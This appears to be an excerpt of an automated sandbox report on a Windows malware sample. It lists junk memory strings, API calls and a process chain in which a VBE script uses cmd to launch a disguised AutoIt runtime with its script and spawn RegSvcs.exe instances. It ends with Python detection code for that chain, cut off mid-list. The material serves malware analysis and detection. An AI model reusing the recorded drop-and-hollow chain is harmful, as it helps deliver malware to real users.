Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %,(;5memstr_a4f13008-8
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 5#-c memstr_19571758-a
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .$*x+p!memstr_6d40cbe1-8
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2y"33memstr_3e6e2b8b-8
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .b"r,memstr_d2287af8-1
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: !t602memstr_823c5a09-d
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: !t"*#c0kmemstr_2fb74167-9
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -.8$,#"y&m$memstr_5129db9f-8
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u+m-t'memstr_53bea6ec-8
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (v6b7i+memstr_c72e8405-e
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +q&:1memstr_a989fa27-6
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &q$**memstr_d7965768-7
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: !u*j+memstr_47732388-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /u4=%memstr_a3aed3c2-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %6$p'memstr_c2668f8c-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #5/28memstr_458e3a02-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'l3d%o+memstr_6c002bb4-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {!x,q$memstr_0512eb62-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '_%z6memstr_298f5b54-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6$%@#memstr_62fa5905-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'n$3+memstr_89bbc99e-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 29#e"memstr_62bea019-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 87)|-memstr_9d9f380a-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -?/w+s2memstr_d10a1833-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j,`#-,memstr_9258d342-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /_6e.memstr_ea1d7cb0-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'l&e-memstr_7896d084-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $a+\$memstr_8a6f0599-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1t,7#z(memstr_75c64600-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ("+?)memstr_ed4f7a3d-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 738,memstr_e9a87d83-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0c'-umemstr_7438cf8c-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +z)u*memstr_a7fe1385-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <"|)g$memstr_a154f04a-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 90y2_memstr_7f07e5a6-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0n-y&memstr_7f62c01d-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2e*:2|'memstr_c99e0d15-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $f1v )-%2memstr_ec2b1ea2-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !)\(memstr_fca02e69-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4x a,memstr_f3130514-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2_#&+a4%*memstr_31eace8c-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3t"g1memstr_5993ae1b-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7<2)&t-memstr_406e422f-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1t5).memstr_d75e5860-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &;"w!memstr_5bc4a922-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >)3!umemstr_fa4d9cb1-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )_"'!smemstr_ac06f604-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t&$memstr_798f60d8-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +i*/0memstr_27b4d0bd-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /v.;.memstr_d7afc05c-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'h+(8memstr_d6d9be36-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .y+s'x33-memstr_467c4a5e-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7 'a2memstr_99db396b-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3t)*memstr_8f9a60fa-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7)e$i(memstr_036eea4d-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3{4j(memstr_fb914d50-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $[5e8memstr_9719385f-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %g#j(memstr_442a3868-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $>3r$$#memstr_093ca55e-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (-= memstr_0efd064d-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -`"c)v'memstr_bf86eb88-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !}"w#memstr_6936700a-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *e+'0z!memstr_3538206d-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "u$f$memstr_02b71c22-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2;2x-memstr_1f25c586-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +n)t,u'memstr_18d218cd-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r()"+memstr_6291c9c6-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .,17/memstr_4e55c375-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (24f*$!memstr_8281cdfe-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n+2%1-memstr_94185ebd-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0w&&/;#i"0 memstr_97c46629-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /1)*'/2memstr_9a15f1cc-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0b*j%j'@3memstr_2d6a20a0-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k!!*f"memstr_a18afd86-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +k!q5+5memstr_057ad33d-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #9r"o)memstr_b8f81bcb-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y!q#&{"memstr_fa749306-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )s3! memstr_6ec85790-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,$s5smemstr_204d5885-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -@%^'memstr_86a87180-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *("-#memstr_44534736-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -$7z.memstr_78a9f494-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n"<#+1f4memstr_18efdf1e-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -%0('memstr_08c8e2f7-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -z,@/memstr_645e8904-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (q,b"memstr_c06ff5d5-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6m3h/memstr_a7f39f39-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '5%%5memstr_f0f47192-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q3.~#memstr_8d09fe27-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !s-k {+memstr_03235987-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -,0t)memstr_860164dc-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >',$m8memstr_c726773b-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %y-{2f0\/memstr_7fb869af-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *#o1memstr_17b0a4ae-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_13*memstr_5c123951-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6f/7+memstr_cadd3cf1-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "d3_&].memstr_9a3aa673-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0o*h2memstr_6b1fe25e-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %*2v2memstr_d2373df0-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0j0&.z+memstr_457c2d88-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !d017memstr_a7a12aa3-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &q8o"f memstr_1af9fa1d-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +%)](y(memstr_248713b5-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4f7n5memstr_fdd2b909-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4z r.memstr_5dd94be0-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /h12#memstr_62582f51-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %.$^"memstr_c9ca45cd-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &8%^#memstr_6ee9d8a8-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *5"q*x&c6memstr_8d3c9948-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b+t2r+memstr_c2daf98f-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +r'x"memstr_f60d46c6-0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_008BBB02 SendInput,keybd_event
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_008BEB81 mouse_event
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe"
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 dmqiuorkt.mp2 tdggoffi.bin
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Process created: C:\Windows\SysWOW64\UserAccountControlSettings.exe "C:\Windows\SysWOW64\UserAccountControlSettings.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_008B13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_008B1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071C5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.00000000010F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2263022121.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262539835.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerG
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.2290624750.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2287052991.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" ThenLL`
                Source: dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624835426.000000000105B000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625489878.0000000001072000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                Source: dmqiuorkt.mp2, dmqiuorkt.mp2.exe, explorer.exe, 00000020.00000000.3685306357.0000000004480000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3681413016.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.00000000087C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000020.00000000.3681413016.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000002.3827677343.0000000001071000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: dmqiuorkt.mp2, 00000007.00000003.1518830857.0000000001015000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624198548.000000000101D000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2238458029.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238029305.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237826667.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager0
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.1864447952.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then6w
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1797532272.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797392869.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797445114.00000000016D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" ThenLL
                Source: tdggoffi.bin.7.dr, tdggoffi.bin.0.dr Binary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1797287899.000000000172F000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796448815.000000000171E000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796850285.0000000001723000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerW@bG
                Source: explorer.exe, 00000020.00000000.3681413016.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000002.3827677343.0000000001071000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Thenx
                Source: explorer.exe, 00000020.00000002.3827066101.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3681032717.0000000000A44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanq
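                The process-creation entries above record the whole drop chain the sandbox observed: the SFX stub runs isci.vbe through wscript.exe; the script uses cmd.exe to run ipconfig /release and ipconfig /renew around the launch of dmqiuorkt.mp2 (an AutoIt runtime carrying a non-executable extension, see the AutoIt strings recovered from its memory) with tdggoffi.bin as its script; and that process then starts several RegSvcs.exe instances, a signed .NET utility commonly used as a hollowing host. The Python below is an added example written for this page, not part of the Joe Sandbox report, that turns those telltales into lineage-based detection logic and runs it over constructed process-creation events shaped like the report's tree. The event layout, PIDs and the benign control event are assumptions; the rule names are arbitrary.

```python
"""Lineage-based detection for the drop chain recorded in the report.

The EVENTS list is constructed to mirror the report's process tree; the event
layout, PIDs and the benign control event are assumptions, not real telemetry.
"""
from dataclasses import dataclass
import ntpath


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path, as a Sysmon EID 1 / EDR event would log it
    cmdline: str


# Constructed events approximating the report's process tree.
EVENTS = [
    ProcEvent(100, 1, r"C:\Users\user\Desktop\FX6KTgnipP.exe", "FX6KTgnipP.exe"),
    ProcEvent(200, 100, r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe"'),
    ProcEvent(300, 200, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ipconfig /release'),
    ProcEvent(301, 200, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin'),
    ProcEvent(302, 200, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ipconfig /renew'),
    ProcEvent(400, 300, r"C:\Windows\SysWOW64\ipconfig.exe", "ipconfig /release"),
    ProcEvent(401, 301, r"C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2", "dmqiuorkt.mp2 tdggoffi.bin"),
    ProcEvent(500, 401, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
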